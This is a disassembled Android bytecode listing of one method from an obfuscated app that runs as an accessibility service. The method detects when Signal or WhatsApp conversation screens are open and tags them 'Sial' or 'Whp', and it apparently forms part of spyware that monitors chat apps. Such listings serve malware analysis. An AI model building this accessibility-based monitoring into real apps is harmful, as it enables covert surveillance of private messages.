# Lcom/mixio/tosh/aprl/ani/ninere;->c(Landroid/view/accessibility/AccessibilityEvent;)Ljava/lang/String; [access_flags=public]
#
# Parameters:
# - local registers: v0...v2
# - v3:android.view.accessibility.AccessibilityEvent
#
# - return:java.lang.String

c-BB@0x0 : [ c-BB@0xc c-BB@0xa8 ]
	0       (00000000) invoke-virtual       v3, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
	1       (00000006) move-result-object   v0
	2       (00000008) if-eqz               v0, +50

c-BB@0xc : [ c-BB@0x18 c-BB@0xa8 ]
	3       (0000000c) invoke-virtual       v3, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
	4       (00000012) move-result-object   v0
	5       (00000014) if-eqz               v0, +4a

c-BB@0x18 : [ c-BB@0x44 ]
	6       (00000018) new-instance         v0, Landroid/content/ComponentName;
	7       (0000001c) invoke-virtual       v3, Landroid/view/accessibility/AccessibilityEvent;->getPackageName()Ljava/lang/CharSequence;
	8       (00000022) move-result-object   v1
	9       (00000024) invoke-interface     v1, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
	10      (0000002a) move-result-object   v1
	11      (0000002c) invoke-virtual       v3, Landroid/view/accessibility/AccessibilityEvent;->getClassName()Ljava/lang/CharSequence;
	12      (00000032) move-result-object   v3
	13      (00000034) invoke-interface     v3, Ljava/lang/CharSequence;->toString()Ljava/lang/String;
	14      (0000003a) move-result-object   v3
	15      (0000003c) invoke-direct        v0, v1, v3, Landroid/content/ComponentName;-><init>(Ljava/lang/String; Ljava/lang/String;)V
	16      (00000042) const/4              v3, 0

c-BB@0x44 : [ c-BB@0x58 ]
	17      (00000044) invoke-virtual       v2, Landroid/accessibilityservice/AccessibilityService;->getPackageManager()Landroid/content/pm/PackageManager;
	18      (0000004a) move-result-object   v1
	19      (0000004c) invoke-virtual       v1, v0, v3, Landroid/content/pm/PackageManager;->getActivityInfo(Landroid/content/ComponentName; I)Landroid/content/pm/ActivityInfo;
	20      (00000052) move-result-object   v1
	21      (00000054) goto                 +2
	44:53
	(Landroid/content/pm/PackageManager$NameNotFoundException; -> 56 c-BB@0x56)

c-BB@0x56 : [ c-BB@0x58 ]
	22      (00000056) const/4              v1, 0

c-BB@0x58 : [ c-BB@0x5c c-BB@0x5e ]
	23      (00000058) if-eqz               v1, +3

c-BB@0x5c : [ c-BB@0x5e ]
	24      (0000005c) const/4              v3, 1

c-BB@0x5e : [ c-BB@0x62 c-BB@0xa8 ]
	25      (0000005e) if-eqz               v3, +25

c-BB@0x62 : [ c-BB@0x80 c-BB@0x8a ]
	26      (00000062) invoke-virtual       v0, Landroid/content/ComponentName;->flattenToShortString()Ljava/lang/String;
	27      (00000068) invoke-virtual       v0, Landroid/content/ComponentName;->flattenToShortString()Ljava/lang/String;
	28      (0000006e) move-result-object   v3
	29      (00000070) const-string         v1, 'org.thoughtcrime.securesms/.conversation.ConversationActivity'
	30      (00000074) invoke-virtual       v3, v1, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
	31      (0000007a) move-result          v3
	32      (0000007c) if-eqz               v3, +7

c-BB@0x80 : [ c-BB@0x84 ]
	33      (00000080) const-string         v3, 'Sial'

c-BB@0x84 : 
	34      (00000084) iput-object          v3, v2, Lcom/mixio/tosh/aprl/ani/ninere;->g Ljava/lang/String;
	35      (00000088) return-object        v3

c-BB@0x8a : [ c-BB@0xa2 c-BB@0xa8 ]
	36      (0000008a) invoke-virtual       v0, Landroid/content/ComponentName;->flattenToShortString()Ljava/lang/String;
	37      (00000090) move-result-object   v3
	38      (00000092) const-string         v0, 'com.whatsapp/.Conversation'
	39      (00000096) invoke-virtual       v3, v0, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
	40      (0000009c) move-result          v3
	41      (0000009e) if-eqz               v3, +5

c-BB@0xa2 : [ c-BB@0x84 ]
	42      (000000a2) const-string         v3, 'Whp'
	43      (000000a6) goto                 -11

c-BB@0xa8 : [ c-BB@0x84 ]
	44      (000000a8) const-string         v3, 'None'
	45      (000000ac) goto                 -14

